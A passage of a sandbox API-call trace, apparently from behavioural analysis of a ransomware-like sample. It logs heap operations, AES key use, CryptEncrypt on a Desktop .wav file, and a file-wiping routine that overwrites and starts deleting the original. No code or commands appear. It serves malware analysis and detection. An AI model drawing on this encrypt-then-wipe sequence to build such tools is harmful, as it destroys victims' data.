hHeap=0x770000) returned 1 [0029.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3c8 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0029.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88caf0 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.561] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0029.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0029.561] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0029.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0029.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.562] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0029.563] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0029.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.563] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.563] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0029.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0029.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0029.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0029.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.565] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.565] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0029.565] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.565] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae968 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0029.566] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0029.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0029.566] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.566] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.566] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.566] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.567] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.567] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x14d27, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x14d30) returned 1 [0029.567] CharLowerBuffW (in: lpsz="byte[85297]", cchLength=0xb | out: lpsz="byte[85297]") returned 0xb [0029.568] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.568] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.568] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8ee750*, pdwDataLen=0x6ae220*=0x14d27, dwBufLen=0x14d30 | out: pbData=0x8ee750*, pdwDataLen=0x6ae220*=0x14d30) returned 1 [0029.569] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.569] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.569] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.577] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0029.577] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.577] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.577] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0029.578] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.578] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.578] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.578] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.578] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.578] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0029.578] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.578] FreeLibrary (hLibModule=0x754b0000) returned 1 [0029.584] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0029.584] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8e0440, ftCreationTime.dwHighDateTime=0x1d5befa, ftLastAccessTime.dwLowDateTime=0x5a88f350, ftLastAccessTime.dwHighDateTime=0x1d5b9ed, ftLastWriteTime.dwLowDateTime=0x5a88f350, ftLastWriteTime.dwHighDateTime=0x1d5b9ed, nFileSizeHigh=0x0, nFileSizeLow=0x14d27, dwReserved0=0x0, dwReserved1=0x777648, cFileName="32U39klehZ.wav", cAlternateFileName="32U39K~1.WAV")) returned 0x7c2240 [0029.585] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.585] CharLowerBuffW (in: lpsz="byte[85287]", cchLength=0xb | out: lpsz="byte[85287]") returned 0xb [0029.586] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0029.586] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0029.586] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0029.586] FreeLibrary (hLibModule=0x76b40000) returned 1 [0029.586] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0029.586] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0029.586] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.587] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\32u39klehz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0029.587] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.587] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0029.587] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.587] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.588] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.588] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0029.588] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.588] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.588] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav", lpFilePart=0x0) returned 0x34 [0029.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.588] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8e0440, ftCreationTime.dwHighDateTime=0x1d5befa, ftLastAccessTime.dwLowDateTime=0x5a88f350, ftLastAccessTime.dwHighDateTime=0x1d5b9ed, ftLastWriteTime.dwLowDateTime=0x1185cf00, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14d27, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="32U39klehZ.wav", cAlternateFileName="32U39K~1.WAV")) returned 0x7c2240 [0029.589] DeleteFileW 